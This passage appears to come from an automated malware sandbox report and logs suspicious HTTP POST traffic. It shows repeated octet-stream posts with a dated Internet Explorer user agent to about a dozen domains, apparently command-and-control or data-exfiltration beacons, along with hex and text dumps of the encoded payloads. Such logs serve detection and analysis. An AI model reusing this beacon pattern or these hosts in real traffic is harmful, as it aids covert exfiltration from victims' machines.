6b 75 47 56 4c 2f 55 39 72 70 56 38 6a 4f 42 5a 39 4b 72 43 4d 70 63 58 4c 7a 30 4b 74 66 6c 55 59 70 65 4e 45 4b 4a 73 31 47 64 7a 6f 46 4d 6f 79 37 57 76 43 36 78 52 62 46 74 71 73 71 31 63 44 65 6b 2f 50 41 51 39 79 78 39 6e 57 53 4e 4d 61 69 49 62 73 75 4c 72 55 64 75 33 6e 41 31 4a 55 47 43 56 63 74 65 62 76 52 79 30 7a 38 79 49 4a 4d 6d 39 50 45 55 4e 35 44 32 59 51 50 75 51 36 37 6c 78 4a 2b 4e 53 4d 65 4a 70 58 56 71 72 66 42 36 73 50 37 63 6d 52 67 4c 2f 7a 47 6a 57 71 63 59 75 34 49 54 31 5a 78 53 63 62 55 4f 78 57 50 57 66 48 62 41 66 4b 33 4d 76 71 38 2f 48 70 32 78 54 68 6d 74 36 59 43 5a 34 61 46 79 67 79 57 42 54 65 6d 48 67 51 44 35 34 47 64 47 2b 4b 4c 39 68 50 4e 4d 64 46 4b 47 66 6e 2f 53 73 66 34 4a 55 61 43 32 45 76 6e 79 38 49 38 49 75 4c 75 57 56 76 42 46 52 37 4d 63 77 6e 2b 68 71 72 6c 77 68 36 69 6d 68 51 33 77 31 6e 4a 63 63 35 45 31 42 73 67 75 6b 35 47 4d 37 47 53 59 33 73 36 32 75 71 2b 46 2b 2b 4b 5a 56 38 4b 52 74 6b 74 6d 72 66 49 42 78 71 67 71 4c 5a 67 49 5a 43 69 6a 2f 41 34 6e 79 50 4f 49 69 73 6f 48 4c 2f 4d 4b 30 58 53 4c 31 71 47 61 52 45 74 55 48 59 51 35 42 6d 5a 6a 6f 41 62 7a 6c 4d 71 51 45 65 49 62 6a 64 73 67 6d 76 48 6e 59 70 74 53 70 6a 46 6f 35 66 4c 70 6e 38 6a 36 42 53 46 78 37 67 3d Data Ascii: buy2YrtS+yaUjGDRUqhrbqT43DrBA6K/H0hcNNPudAVewLnl6dwm+yXU7DZ8Mm24tGBpdJXzPvYXiAAVBE18q3mMcRSQ3fYSP5pFM9oOEw9ldDbp6cK/Au+xtZ7QLIfm83lErb4ZW7FbS8kuGVL/U9rpV8jOBZ9KrCMpcXLz0KtflUYpeNEKJs1GdzoFMoy7WvC6xRbFtqsq1cDek/PAQ9yx9nWSNMaiIbsuLrUdu3nA1JUGCVctebvRy0z8yIJMm9PEUN5D2YQPuQ67lxJ+NSMeJpXVqrfB6sP7cmRgL/zGjWqcYu4IT1ZxScbUOxWPWfHbAfK3Mvq8/Hp2xThmt6YCZ4aFygyWBTemHgQD54GdG+KL9hPNMdFKGfn/Ssf4JUaC2Evny8I8IuLuWVvBFR7Mcwn+hqrlwh6imhQ3w1nJcc5E1Bsguk5GM7GSY3s62uq+F++KZV8KRtktmrfIBxqgqLZgIZCij/A4nyPOIisoHL/MK0XSL1qGaREtUHYQ5BmZjoAbzlMqQEeIbjdsgmvHnYptSpjFo5fLpn8j6BSFx7g=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1938User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: aiolos-sa.grConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 2032User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: web-york.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1421User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 34 77 63 72 68 68 73 37 57 6e 45 50 56 53 67 62 4d 72 55 7a 74 77 54 67 42 75 53 68 41 31 4f 68 66 34 34 74 4c 57 4c 68 56 34 64 43 36 62 76 63 53 74 30 70 71 50 62 34 56 5a 49 55 31 77 68 71 39 34 6d 78 57 68 61 50 59 35 4f 73 44 6a 2b 32 4c 63 65 32 52 75 6d 6f 52 33 74 50 59 6b 63 55 6a 4a 68 79 4b 4e 2f 38 33 45 78 75 31 46 34 7a 39 74 43 79 58 64 69 4a 78 34 4a 4b 59 44 67 72 55 4e 67 58 53 58 47 6e 6c 5a 69 4d 32 70 50 65 4a 50 34 39 42 6b 62 63 76 67 4d 77 7a 2f 4a 5a 75 6b 65 66 2b 4d 57 45 56 2b 55 56 4a 42 59 7a 2b 30 41 49 78 49 66 34 30 45 55 6e 38 39 75 4b 69 63 43 6a 31 47 6b 55 47 2f 44 61 4b 66 51 42 32 33 49 66 42 51 48 49 65 4e 4f 33 71 63 7a 54 4a 73 51 44 6a 56 38 5a 39 4b 53 34 33 51 49 44 62 4b 33 46 41 44 76 4f 5a 48 61 2f 49 6c 6a 2f 77 44 44 36 4f 31 64 34 58 76 4a 2f 65 76 67 68 37 65 78 51 70 73 59 6e 61 38 58 63 49 31 41 30 38 39 5a 44 47 46 31 31 30 4a 6a 47 70 34 42 64 50 67 64 47 48 37 65 48 30 33 31 53 4a 44 57 4c 4a 67 48 73 35 35 68 5a 43 2b 54 45 64 53 4e 72 70 44 37 53 51 63 7a 70 6e 35 59 34 42 49 6d 78 49 2f 6f 6f 43 6f 46 43 45 46 37 38 49 67 44 51 34 36 35 6e 50 74 75 41 79 79 63 41 6f 6a 56 69 51 74 47 78 54 78 6c 5a 67 41 6b 7a 58 4b 68 48 69 72 6d 67 67 5a 54 4f 4c 75 35 48 4f 57 75 7a 5a 6c 77 4c 38 77 61 35 68 56 63 6f 61 4d 36 56 52 53 55 55 47 53 2b 4e 45 4e 36 4b 57 5a 6b 47 35 74 47 30 58 6e 70 36 6d 56 38 5a 4e 65 65 7a 57 57 64 55 36 31 47 49 67 75 65 71 43 69 65 42 4d 35 35 6a 4d 2f 72 69 6e 34 31 34 6c 38 57 41 4b 6d 78 47 57 33 44 5a 43 6a 69 50 43 6e 67 46 4e 67 76 57 6f 68 65 74 62 2f 31 72 73 42 4d 2f 31 72 44 52 57 46 44 6e 72 6c 71 73 64 36 36 32 73 2b 2b 48 56 4a 43 70 63 44 63 3d Data Ascii: 4wcrhhs7WnEPVSgbMrUztwTgBuShA1Ohf44tLWLhV4dC6bvcSt0pqPb4VZIU1whq94mxWhaPY5OsDj+2Lce2RumoR3tPYkcUjJhyKN/83Exu1F4z9tCyXdiJx4JKYDgrUNgXSXGnlZiM2pPeJP49BkbcvgMwz/JZukef+MWEV+UVJBYz+0AIxIf40EUn89uKicCj1GkUG/DaKfQB23IfBQHIeNO3qczTJsQDjV8Z9KS43QIDbK3FADvOZHa/Ilj/wDD6O1d4XvJ/evgh7exQpsYna8XcI1A089ZDGF110JjGp4BdPgdGH7eH031SJDWLJgHs55hZC+TEdSNrpD7SQczpn5Y4BImxI/ooCoFCEF78IgDQ465nPtuAyycAojViQtGxTxlZgAkzXKhHirmggZTOLu5HOWuzZlwL8wa5hVcoaM6VRSUUGS+NEN6KWZkG5tG0Xnp6mV8ZNeezWWdU61GIgueqCieBM55jM/rin414l8WAKmxGW3DZCjiPCngFNgvWohetb/1rsBM/1rDRWFDnrlqsd662s++HVJCpcDc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 691User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: hbfuels.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 37 49 52 61 6b 75 33 43 4d 56 65 6f 78 37 49 53 62 6d 78 36 46 4f 58 68 72 30 41 4b 54 68 74 32 42 4b 55 65 70 7a 38 49 52 61 6b 75 33 44 4d 57 66 71 7a 38 49 53 62 6b 75 34 44 4d 59 69 73 32 42 4b 55 64 6f 78 36 47 50 59 69 73 31 41 4b 56 66 70 79 37 4a 53 62 6b 76 34 44 4d 56 69 74 32 42 4b 55 64 6d 78 36 46 4f 58 68 76 34 48 52 62 6c 76 34 45 4f 59 68 73 31 41 4a 54 63 6c 76 34 45 50 59 69 73 31 41 4b 54 63 6c 77 35 45 4e 58 67 71 7a 38 49 52 61 6a 75 33 43 4c 56 65 6f 78 36 47 50 59 68 73 31 41 4a 53 63 6c 76 34 45 4e 57 66 70 7a 38 48 52 61 6a 75 33 43 4c 56 65 6f 78 39 49 52 61 6a 75 33 43 4d 56 66 70 79 37 48 51 5a 69 74 32 42 4c 55 64 6d 78 36 46 4f 59 68 72 31 41 4a 53 63 6c 76 34 44 4f 58 67 71 30 39 49 53 63 6c 76 34 45 4e 57 66 71 7a 39 49 52 61 6b 75 33 43 4d 56 65 70 79 37 47 50 5a 69 73 31 42 4b 54 64 6d 77 36 47 51 5a 69 73 32 42 4b 54 63 6d 77 35 46 4f 58 68 72 30 39 49 53 62 6b 75 33 44 4d 56 66 70 79 37 48 51 5a 69 74 32 42 4b 55 65 6f 78 36 46 50 59 68 72 31 41 4a 53 62 6c 76 34 44 4d 57 66 70 79 38 48 52 61 6a 74 33 43 4c 55 65 6f 78 36 47 50 59 68 72 31 41 4a 53 62 6c 76 34 44 4d 57 66 70 7a 38 48 52 61 6a 74 33 43 4c 55 65 6f 78 36 47 50 59 69 73 31 41 4b 54 63 6c 76 35 45 4e 57 66 71 7a 38 48 52 61 6a 75 33 43 4d 56 65 6f 79 37 47 50 5a 69 73 31 41 4b 54 63 6c 77 35 45 4e 57 67 71 7a 38 48 52 61 6a 74 33 43 4c 56 65 6f 78 37 47 50 5a 69 73 31 42 4b 54 63 6d 77 35 45 4e 58 67 71 7a 38 49 52 61 6a 75 33 43 4c 55 65 6f 78 37 47 50 59 68 73 31 41 4a 54 63 6c 77 35 45 4e 58 67 71 7a 38 49 52 61 6b 75 33 44 4d 56 65 70 79 37 47 50 5a 69 73 31 42 4b 54 63 6d 77 35 45 4f 58 67 71 7a 39 49 52 61 6a 75 33 43 4d 56 65 70 79 37 47 51 5a 69 73 31 42 4b 54 63 6d 77 35 45 4f 58 67 71 7a 39 49 52 62 6b 75 33 44 4d 56 65 6f 79 37 48 51 5a 69 74 32 42 4b 55 64 6d 77 35 46 4f 58 68 72 30 39 49 53 62 6b 75 34 44 4d 56 65 70 79 37 47 51 5a 69 74 32 42 4b 55 64 6d 77 36 46 4f 59 68 72 30 39 4a 53 62 6b 75 34 44 4d 56 65 70 79 37 47 51 5a 69 74 32 42 4b 54 64 6d 77 35 46 4f 58 67 72 30 39 49 53 62 6b 75 34 44 4d 56 65 70 79 37 47 51 5a Data Ascii: 7IRaku3CMVeox7ISbmx6FOXhr0AKTht2BKUepz8IRaku3DMWfqz8ISbku4DMYis2BKUdox6GPYis1AKVfpy7JSbkv4DMVit2BKUdmx6FOXhv4HRblv4EOYhs1AJTclv4EPYis1AKTclw5ENXgqz8IRaju3CLVeox6GPYhs1AJSclv4ENWfpz8HRaju3CLVeox9IRaju3CMVfpy7HQZit2BLUdmx6FOYhr1AJSclv4DOXgq09ISclv4ENWfqz9IRaku3CMVepy7GPZis1BKTdmw6GQZis2BKTcmw5FOXhr09ISbku3DMVfpy7HQZit2BKUeox6FPYhr1AJSblv4DMWfpy8HRajt3CLUeox6GPYhr1AJSblv4DMWfpz8HRajt3CLUeox6GPYis1AKTclv5ENWfqz8HRaju3CMVeoy7GPZis1AKTclw5ENWgqz8HRajt3CLVeox7GPZis1BKTcmw5ENXgqz8IRaju3CLUeox7GPYhs1AJTclw5ENXgqz8IRaku3DMVepy7GPZis1BKTcmw5EOXgqz9IRaju3CMVepy7GQZis1BKTcmw5EOXgqz9IRbku3DMVeoy7HQZit2BKUdmw5FOXhr09ISbku4DMVepy7GQZit2BKUdmw6FOYhr09JSbku4DMV
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 47 77 4e 75 4f 2f 43 66 6f 6e 47 46 4d 76 32 70 41 37 4c 61 61 36 50 38 70 55 6d 59 42 53 50 37 4a 4e 37 58 7a 6c 6a 67 36 51 6c 70 70 54 4d 6a 56 54 4a 70 73 43 6e 4a 58 6b 32 4d 50 35 74 43 51 69 76 68 32 74 4a 6d 70 47 74 56 33 43 63 62 66 77 55 67 45 43 77 65 30 4d 6b 79 76 44 43 6e 56 32 61 78 34 4d 67 63 45 48 51 5a 78 58 77 78 6e 70 71 77 75 6e 38 36 65 32 71 4c 32 42 66 6a 69 67 45 55 2b 41 56 2f 6e 42 42 48 45 42 73 6c 43 2f 59 34 52 44 6b 67 66 59 7a 62 45 46 6f 35 6f 77 51 59 30 63 2b 66 61 57 46 32 5a 54 48 6a 4e 4a 30 36 51 4f 4c 77 6b 6d 72 47 62 58 5a 6a 6d 37 34 37 55 4a 48 73 43 52 58 38 45 2b 6a 75 42 70 7a 73 53 77 65 69 64 62 4b 6d 32 48 77 4b 35 35 44 37 41 39 6d 47 45 71 4f 38 43 52 76 6b 6f 79 34 56 62 52 75 78 76 42 4b 4d 75 70 73 78 41 57 66 63 32 71 55 6f 58 31 38 66 31 6d 45 37 6f 57 6d 49 47 49 48 41 67 5a 74 50 49 52 66 61 5a 30 76 6c 61 7a 35 57 46 77 73 38 70 6a 42 46 33 6a 79 7a 51 42 2b 35 77 4f 57 57 52 6e 45 61 4f 48 63 73 74 47 65 30 63 53 74 44 54 76 47 39 31 2b 2f 4e 7a 6c 71 74 41 66 6b 39 6e 79 71 5a 6d 6f 65 53 48 63 78 74 75 71 31 56 6b 67 6c 73 4e 34 6f 68 63 74 39 72 4e 46 4a 4b 64 6c 6a 76 49 54 61 75 36 53 32 59 63 46 65 72 76 51 78 32 59 75 6b 6b 53 2f 72 34 70 33 53 32 30 6e 42 4f 57 46 36 39 38 32 2f 56 47 52 35 7a 31 32 69 41 68 4f 4a 42 79 53 47 78 31 62 50 34 62 6c 35 4c 56 44 6f 41 73 71 6d 6a 68 59 50 5a 56 56 6d 58 51 51 51 6d 4a 62 4e 48 62 6a 44 6a 45 33 4e 55 6b 30 44 4e 45 61 65 37 74 48 74 33 47 37 51 64 6a 57 4c 76 70 6f 35 6f 64 4a 6c 46 49 6c 75 41 58 59 34 71 45 45 34 69 47 69 78 78 56 55 4c 38 44 41 63 63 57 2f 55 38 Data Ascii: GwNuO/CfonGFMv2pA7Laa6P8pUmYBSP7JN7Xzljg6QlppTMjVTJpsCnJXk2MP5tCQivh2tJmpGtV3CcbfwUgECwe0MkyvDCnV2ax4MgcEHQZxXwxnpqwun86e2qL2BfjigEU+AV/nBBHEBslC/Y4RDkgfYzbEFo5owQY0c+faWF2ZTHjNJ06QOLwkmrGbXZjm747UJHsCRX8E+juBpzsSweidbKm2HwK55D7A9mGEqO8CRvkoy4VbRuxvBKMupsxAWfc2qUoX18f1mE7oWmIGIHAgZtPIRfaZ0vlaz5WFws8pjBF3jyzQB+5wOWWRnEaOHcstGe0cStDTvG91+/NzlqtAfk9nyqZmoeSHcxtuq1VkglsN4ohct9rNFJKdljvITau6S2YcFervQx2YukkS/r4p3S20nBOWF6982/VGR5z12iAhOJBySGx1bP4bl5LVDoAsqmjhYPZVVmXQQQmJbNHbjDjE3NUk0DNEae7tHt3G7QdjWLvpo5odJlFIluAXY4qEE4iGixxVUL8DAccW/U8
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1358User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mjrcpas.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 368User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sidepath.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 33 47 50 59 69 73 31 41 4a 53 64 71 7a 38 48 52 62 6c 78 36 46 4f 58 67 71 30 39 49 52 65 6f 79 37 47 50 59 68 72 31 42 4b 55 65 6f 78 36 47 50 59 68 74 34 44 4d 56 66 70 79 37 48 51 5a 69 73 31 42 4b 54 64 6d 77 35 45 52 61 6a 76 35 46 4f 58 68 72 30 39 4b 54 63 6c 76 34 45 4e 58 67 71 30 39 49 52 61 6a 74 34 44 4e 57 66 70 79 37 47 50 59 68 73 31 44 4f 59 69 73 34 44 4d 57 66 70 79 38 48 51 5a 69 73 36 49 52 62 6d 77 35 45 4e 57 69 76 35 45 4e 58 67 71 30 41 4a 54 63 6d 77 35 45 4e 58 67 71 30 39 49 52 66 71 30 39 49 54 64 6d 77 35 45 51 5a 6a 74 32 42 4b 56 65 6f 79 37 48 51 5a 6a 75 35 45 4f 58 68 72 30 39 49 53 62 6b 75 34 44 4e 57 68 72 31 41 4a 53 62 6c 79 38 48 51 5a 69 74 32 42 4b 54 63 6c 79 37 48 52 61 6c 76 34 45 4e 57 66 71 7a 38 48 52 61 6a 74 32 49 54 66 71 7a 38 48 52 66 70 33 43 4d 56 66 70 79 37 48 51 5a 69 73 34 44 4d 57 66 70 7a 38 48 51 5a 69 73 32 42 4b 54 63 6c 77 35 45 4e 57 67 71 7a 38 48 51 61 6a 74 32 43 4c 55 64 6d 77 36 46 4f 59 68 72 30 39 49 53 62 6c 76 35 45 4e 57 66 70 7a 38 48 51 5a 69 74 32 42 4b 55 64 6d 77 35 46 4f 58 67 71 7a 38 49 52 61 6a 74 32 42 Data Ascii: 3GPYis1AJSdqz8HRblx6FOXgq09IReoy7GPYhr1BKUeox6GPYht4DMVfpy7HQZis1BKTdmw5ERajv5FOXhr09KTclv4ENXgq09IRajt4DNWfpy7GPYhs1DOYis4DMWfpy8HQZis6IRbmw5ENWiv5ENXgq0AJTcmw5ENXgq09IRfq09ITdmw5EQZjt2BKVeoy7HQZju5EOXhr09ISbku4DNWhr1AJSbly8HQZit2BKTcly7HRalv4ENWfqz8HRajt2ITfqz8HRfp3CMVfpy7HQZis4DMWfpz8HQZis2BKTclw5ENWgqz8HQajt2CLUdmw6FOYhr09ISblv5ENWfpz8HQZit2BKUdmw5FOXgqz8IRajt2B
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 4c 46 4b 75 6f 64 41 66 57 33 46 4b 42 44 6f 67 59 33 41 4d 61 49 50 72 5a 6f 48 34 38 6d 53 64 42 4b 79 62 63 6a 42 54 52 6e 6d 2f 6f 44 72 67 56 49 56 39 34 55 79 65 6f 67 56 58 4b 63 48 47 4c 76 6b 4c 51 4a 78 5a 70 37 6c 71 70 72 6e 62 45 6b 6b 63 35 39 55 78 4f 38 2f 44 79 48 4d 6b 41 4b 69 66 37 56 42 37 58 59 5a 73 48 79 39 78 6d 4c 6f 68 76 41 32 62 31 47 59 63 42 66 56 74 5a 53 79 59 34 36 42 74 32 68 48 73 4c 79 4e 78 74 76 49 7a 52 30 53 54 78 6d 53 41 34 72 49 6d 57 52 43 5a 48 2b 39 50 7a 4d 2f 2f 56 52 30 42 57 6d 75 70 76 35 49 61 37 4c 46 32 76 42 54 53 4d 66 32 5a 37 53 45 70 68 61 31 77 6f 2b 72 64 6d 51 6c 65 36 32 5a 6a 76 6c 61 6c 4c 4c 2f 30 65 42 53 76 31 41 76 69 4c 35 58 36 63 6d 48 34 37 39 6c 58 6a 4e 67 53 78 6e 63 77 35 4b 33 59 6a 6a 73 2f 68 50 30 4d 59 58 46 30 72 61 6f 4c 77 46 54 49 65 76 45 4c 42 6e 68 46 46 62 52 44 35 45 4d 77 51 64 6e 68 55 79 54 50 63 45 70 2f 58 49 48 46 74 77 70 72 55 6a 59 70 37 58 42 61 51 59 31 50 79 65 44 77 35 64 7a 73 43 49 6c 31 48 71 6c 72 57 78 51 52 6d 75 77 49 75 71 43 6a 32 48 69 34 71 39 49 6b 39 67 71 78 69 63 5a 62 59 4d 31 49 42 54 54 4e 35 72 4c 67 4c 47 34 47 42 33 6d 49 30 7a 45 58 78 55 58 65 77 64 65 4c 56 65 64 63 68 51 41 68 46 39 4b 66 51 72 4a 7a 6f 6d 2b 32 2f 53 42 46 45 33 67 6a 69 75 76 53 58 76 79 36 64 48 4e 2f 44 69 41 35 79 31 74 39 45 6c 6b 6d 6d 7a 4b 4f 59 70 44 46 61 43 52 35 73 59 4d 48 52 47 48 44 74 50 6a 69 6b 48 68 51 77 56 5a 34 53 6e 70 2b 50 6c 37 6a 59 68 31 69 2b 68 62 57 35 67 33 6c 56 4e 38 58 65 58 46 7a 48 2f 38 72 7a 58 70 49 4f 71 2b 4c 72 30 31 37 77 76 43 74 44 4e 6f 55 32 39 50 4b 4f 43 63 65 6e 47 58 57 71 31 65 4b 6b 61 6b 33 61 4a 58 42 Data Ascii: LFKuodAfW3FKBDogY3AMaIPrZoH48mSdBKybcjBTRnm/oDrgVIV94UyeogVXKcHGLvkLQJxZp7lqprnbEkkc59UxO8/DyHMkAKif7VB7XYZsHy9xmLohvA2b1GYcBfVtZSyY46Bt2hHsLyNxtvIzR0STxmSA4rImWRCZH+9PzM//VR0BWmupv5Ia7LF2vBTSMf2Z7SEpha1wo+rdmQle62ZjvlalLL/0eBSv1AviL5X6cmH479lXjNgSxncw5K3Yjjs/hP0MYXF0raoLwFTIevELBnhFFbRD5EMwQdnhUyTPcEp/XIHFtwprUjYp7XBaQY1PyeDw5dzsCIl1HqlrWxQRmuwIuqCj2Hi4q9Ik9gqxicZbYM1IBTTN5rLgLG4GB3mI0zEXxUXewdeLVedchQAhF9KfQrJzom+2/SBFE3gjiuvSXvy6dHN/DiA5y1t9ElkmmzKOYpDFaCR5sYMHRGHDtPjikHhQwVZ4Snp+Pl7jYh1i+hbW5g3lVN8XeXFzH/8rzXpIOq+Lr017wvCtDNoU29PKOCcenGXWq1eKkak3aJXB
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1660User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yhsll.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 420User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: wanoa.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 4a 56 67 71 31 42 4b 55 64 72 32 43 4c 56 66 73 32 4c 6d 78 37 48 51 61 6a 77 35 45 4f 58 6a 77 39 4b 58 6a 7a 43 4e 61 6d 30 42 4f 61 6d 7a 33 41 4e 57 66 71 7a 39 4a 54 63 6d 77 36 46 50 59 6a 75 33 43 4d 57 66 72 35 48 55 69 77 37 4b 57 6a 77 43 50 62 6f 31 44 50 63 71 33 46 53 66 74 34 49 55 66 74 37 4a 57 69 76 38 4b 58 6b 79 39 4d 59 6b 7a 43 4f 61 6f 30 43 4f 62 6d 30 43 50 62 6f 31 45 50 63 70 31 45 51 64 71 33 47 53 65 73 35 49 55 68 76 38 4b 57 59 6a 74 33 43 4d 56 65 70 79 37 48 52 61 6b 75 33 44 4d 56 66 70 79 38 49 52 62 6b 75 34 44 4d 57 66 70 7a 38 48 52 62 6b 75 34 44 4d 57 66 71 7a 38 49 52 62 6b 75 34 44 4d 57 66 70 7a 38 49 52 62 6b 75 34 44 4e 57 66 71 7a 38 49 52 62 6b 75 34 44 4d 57 66 70 7a 38 49 52 61 6b 75 34 44 4d 57 66 70 7a 38 4a 57 69 76 38 4b 57 6a 78 38 4c 59 6c 79 42 4f 61 6d 30 45 52 64 71 49 54 63 6c 77 35 45 4f 58 68 72 30 41 4a 53 63 6f 7a 43 51 64 71 32 45 51 63 72 34 47 54 66 73 35 47 53 66 73 34 47 53 65 73 34 49 55 68 76 37 4a 57 69 76 37 4b 59 6b 78 41 4f 61 6d 7a 42 4f 64 70 32 47 61 74 32 43 4c 56 65 6f 79 37 48 51 5a 6a 74 32 45 50 63 70 31 45 52 65 71 34 49 55 67 75 36 49 56 68 75 36 4b 57 69 78 42 4f 61 6d 30 43 4f 61 6d 30 42 4f 76 47 51 5a 6a 74 33 43 4c 56 65 70 79 37 48 51 5a 6a 74 33 43 4c Data Ascii: JVgq1BKUdr2CLVfs2Lmx7HQajw5EOXjw9KXjzCNam0BOamz3ANWfqz9JTcmw6FPYju3CMWfr5HUiw7KWjwCPbo1DPcq3FSft4IUft7JWiv8KXky9MYkzCOao0CObm0CPbo1EPcp1EQdq3GSes5IUhv8KWYjt3CMVepy7HRaku3DMVfpy8IRbku4DMWfpz8HRbku4DMWfqz8IRbku4DMWfpz8IRbku4DNWfqz8IRbku4DMWfpz8IRaku4DMWfpz8JWiv8KWjx8LYlyBOam0ERdqITclw5EOXhr0AJScozCQdq2EQcr4GTfs5GSfs4GSes4IUhv7JWiv7KYkxAOamzBOdp2Gat2CLVeoy7HQZjt2EPcp1EReq4IUgu6IVhu6KWixBOam0COam0BOvGQZjt3CLVepy7HQZjt3CL
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 44 72 70 75 52 6c 73 38 78 48 48 4a 61 75 64 66 63 6b 56 56 47 45 53 33 64 45 6a 68 7a 56 49 65 76 7a 75 59 35 7a 4e 47 4c 48 69 51 66 57 77 43 76 42 57 79 50 44 2b 75 51 47 77 64 51 53 6a 39 65 38 49 68 37 2f 7a 2f 54 5a 46 4a 74 4c 4f 30 33 5a 63 52 38 61 73 71 54 6e 76 56 4a 2b 38 6e 2f 2b 51 55 42 4b 70 73 57 4b 67 41 77 4b 4f 75 2f 58 50 52 64 42 2b 79 76 43 42 47 46 66 4a 4b 6c 55 70 38 59 41 36 6d 4c 35 47 32 75 45 58 77 36 64 53 35 7a 4b 67 34 55 32 32 67 77 5a 6a 4e 59 31 6c 57 76 46 31 68 6d 38 48 47 30 61 34 6f 77 46 52 77 54 51 44 31 7a 58 50 2b 62 69 54 4c 4c 35 77 2f 71 64 78 57 6b 58 32 6f 53 50 77 78 2f 4d 6b 54 6e 30 61 57 6c 38 4d 64 75 49 38 49 30 30 79 57 4d 53 54 78 67 35 6a 62 4e 34 69 33 43 51 34 54 38 56 73 63 6f 47 38 58 70 76 74 72 59 50 55 76 46 70 50 76 36 68 4d 6f 4d 44 6c 2b 48 71 4b 57 70 54 44 52 7a 42 31 5a 79 75 4c 76 78 57 4a 35 37 45 39 62 5a 7a 75 4a 75 56 31 46 48 59 74 32 4f 64 34 36 6d 76 47 54 32 44 6b 41 49 41 47 44 44 45 45 74 4c 2f 4f 72 51 58 65 45 74 31 2f 72 48 69 4b 61 66 49 58 32 54 72 66 4a 67 59 4a 56 67 57 4f 74 4a 53 43 30 4c 47 70 62 55 46 4b 72 41 2f 44 7a 34 53 67 71 54 53 38 78 73 30 4c 62 5a 53 45 73 75 74 4e 49 4c 2b 56 78 58 6a 6c 5a 34 41 45 77 42 71 36 6d 37 77 6a 54 70 77 56 58 68 75 6d 32 36 48 79 45 37 4b 47 68 38 6e 54 77 64 58 53 38 46 51 79 34 34 6b 79 47 4d 43 58 55 68 79 6f 74 6e 61 79 61 32 30 74 42 4f 43 58 6b 30 4b 61 63 38 59 41 44 6f 78 39 35 7a 49 4b 78 66 72 64 2f 74 4f 69 6b 5a 6e 73 32 57 56 4d 7a 2f 57 64 57 55 55 74 62 72 75 2f 32 64 56 59 36 31 64 61 55 50 46 78 73 6e 61 50 48 48 4f 6a 54 67 39 30 61 46 57 43 33 65 45 6c 31 6b 55 6b 70 6b 39 33 49 6d 53 4a 35 39 70 47 61 63 66 56 6d 4c 6b 32 6a 45 74 74 71 48 49 50 78 70 33 79 46 64 65 53 55 67 55 4e 45 45 65 77 48 4c 64 45 33 69 7a 30 3d Data Ascii: 